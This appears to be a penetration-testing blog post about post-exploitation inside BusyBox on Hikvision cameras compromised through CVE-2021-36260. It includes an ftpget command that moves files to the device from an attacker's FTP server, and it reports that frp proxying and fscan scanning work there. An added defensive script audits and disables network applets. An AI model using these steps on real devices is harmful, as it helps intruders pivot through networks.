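Introduction

Hikvision cameras come up frequently during internal network penetration tests. Because installing patches on them is cumbersome, most of these cameras remain vulnerable to the CVE-2021-36260 command injection vulnerability. Once a shell is obtained, it turns out to be a BusyBox environment in which only some commands can be executed. This article looks at post-exploitation inside BusyBox.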

Installation

The default BusyBox version on Hikvision cameras is 1.26.2.

Download URL:
https://busybox.net/downloads/binaries/1.26.2-i686/busybox

Install and use:

sudo curl -so /usr/bin/busybox https://busybox.net/downloads/binaries/1.26.2-i686/busybox 
sudo chmod +x /usr/bin/busybox
sudo busybox --help

A Docker environment is recommended:

sudo docker pull busybox
sudo docker run -it --rm busybox


Commands included by default

cpid, add-shell, addgroup, adduser, adjtimex, ar, arp, arping, ash, awk, base64, basename, blkdiscard, blkid, blockdev, bootchartd, brctl, bunzip2, bzcat, bzip2, cal, cat, catv, chat, chattr, chgrp, chmod, chown, chpasswd, chpst, chroot, chrt, chvt, cksum, clear, cmp, comm, conspy, cp, cpio, crond, crontab, cryptpw, cttyhack, cut, date, dc, dd, deallocvt, delgroup, deluser, depmod, devmem, df, dhcprelay, diff, dirname, dmesg, dnsd, dnsdomainname, dos2unix, dpkg, du, dumpkmap, dumpleases, echo, ed, egrep, eject, env, envdir, envuidgid, expand, expr, fakeidentd, false, fatattr, fbset, fbsplash, fdflush, fdformat, fdisk, fgconsole, fgrep, find, findfs, flash_eraseall, flash_lock, flash_unlock, flashcp, flock, fold, free, freeramdisk, fsck, fsck.minix, fstrim, fsync, ftpd, ftpget, ftpput, fuser, getopt, getty, grep, groups, gunzip, gzip, halt, hd, hdparm, head, hexdump, hostid, hostname, httpd, hush, hwclock, i2cdetect, i2cdump, i2cget, i2cset, id, ifconfig, ifenslave, ifplugd, inetd, init, inotifyd, insmod, install, ionice, iostat, ip, ipaddr, ipcalc, ipcrm, ipcs, iplink, ipneigh, iproute, iprule, iptunnel, kbd_mode, kill, killall, killall5, klogd, last, less, linux32, linux64, linuxrc, ln, loadfont, loadkmap, logger, login, logname, losetup, lpd, lpq, lpr, ls, lsattr, lsmod, lspci, lsusb, lzcat, lzma, lzop, lzopcat, makedevs, makemime, man, md5sum, mdev, mesg, microcom, mkdir, mkdosfs, mke2fs, mkfifo, mkfs.ext2, mkfs.minix, mkfs.vfat, mknod, mkpasswd, mkswap, mktemp, modinfo, modprobe, more, mount, mountpoint, mpstat, mt, mv, nameif, nbd-client, nc, netstat, nice, nmeter, nohup, ntpd, od, openvt, passwd, patch, pgrep, pidof, ping, ping6, pipe_progress, pivot_root, pkill, pmap, popmaildir, poweroff, powertop, printenv, printf, ps, pscan, pstree, pwd, pwdx, raidautorun, rdate, rdev, readlink, readprofile, realpath, reboot, reformime, remove-shell, renice, reset, resize, rev, rm, rmdir, rmmod, route, rpm, rpm2cpio, rtcwake, run-parts, runlevel, runsv, runsvdir, rx, script,
scriptreplay, sed, sendmail, seq, setarch, setconsole, setfont, setkeycodes, setlogcons, setserial, setsid, setuidgid, sh, sha1sum, sha256sum, sha3sum, sha512sum, showkey, shuf, slattach, sleep, smemcap, softlimit, sort, split, start-stop-daemon, stat, strings, stty, su, sulogin, sum, sv, svc, svlogd, swapoff, swapon, switch_root, sync, sysctl, syslogd, tac, tail, tar, taskset, tcpsvd, tee, telnet, telnetd, test, tftp, tftpd, time, timeout, top, touch, tr, traceroute, traceroute6, true, truncate, tty, ttysize, tunctl, tune2fs, ubiattach, ubidetach, ubimkvol, ubirename, ubirmvol, ubirsvol, ubiupdatevol, udhcpc, udhcpd, udpsvd, uevent, umount, uname, uncompress, unexpand, uniq, unix2dos, unlink, unlzma, unlzop, unxz, unzip, uptime, users, usleep, uudecode, uuencode, vconfig, vi, vlock, volname, wall, watch, watchdog, wc, wget, which, who, whoami, whois, xargs, xz, xzcat, yes, zcat, zcip

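Uploading files

Among the available commands, ftpget can be used to upload files over FTP.
Start an FTP server on Kali:

# The login user is a system user, here kali/kali
sudo apt install vsftpd
sudo service vsftpd start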

Download the file from BusyBox:

ftpget -u kali -p kali 192.168.180.190 1.txt 1.txt
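
A defender-side check for the applet list and the ftpget finding above, as an added example that is not part of the original post: it flags network-capable applets in a BusyBox applet list and prints the Kconfig lines that disable them in a firmware build. The two review sets, the function names and the CONFIG_ naming rule are assumptions of this example.

```sh
#!/bin/sh
# Added example: flag network-capable applets in a BusyBox applet list.
# The two review sets are this example's choice, not a BusyBox feature.
CLIENTS="ftpget ftpput tftp wget nc telnet"             # outbound transfer / connection
SERVERS="ftpd tftpd telnetd httpd tcpsvd udpsvd inetd"  # listening services

# stdin: applet names separated by commas, spaces or newlines
# (the format of `busybox --help` or `busybox --list`).
# stdout: "client NAME" or "server NAME", one line per flagged applet.
audit_applets() {
    tr ',\t ' '\n\n\n' | sed '/^$/d' | LC_ALL=C sort -u |
    while read -r applet; do
        case " $CLIENTS " in *" $applet "*) echo "client $applet" ;; esac
        case " $SERVERS " in *" $applet "*) echo "server $applet" ;; esac
    done
}

# stdin: output of audit_applets.
# stdout: Kconfig lines that disable each flagged applet in a BusyBox .config.
# Assumption: the symbol is CONFIG_ plus the upper-cased applet name, which
# holds for the applets in the two sets above.
disable_fragment() {
    while read -r _kind applet; do
        printf '# CONFIG_%s is not set\n' "$(printf '%s' "$applet" | tr 'a-z' 'A-Z')"
    done
}

# Constructed sample: a short excerpt in the same comma-separated format.
SAMPLE="ash, cat, ftpget, ftpput, ls, nc,telnetd, tftp, vi, wget"

printf '%s\n' "$SAMPLE" | audit_applets
printf '%s\n' "$SAMPLE" | audit_applets | disable_fragment
```

On a device or firmware image under review, pipe the output of `busybox --list` into `audit_applets` instead of the sample.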


Proxy tools

The BusyBox used in this test has the x86-64 architecture.

frp test

Testing confirms that BusyBox can run a proxy tool built for the matching architecture.

Scanning tools

fscan

It also works normally.

Q.E.D.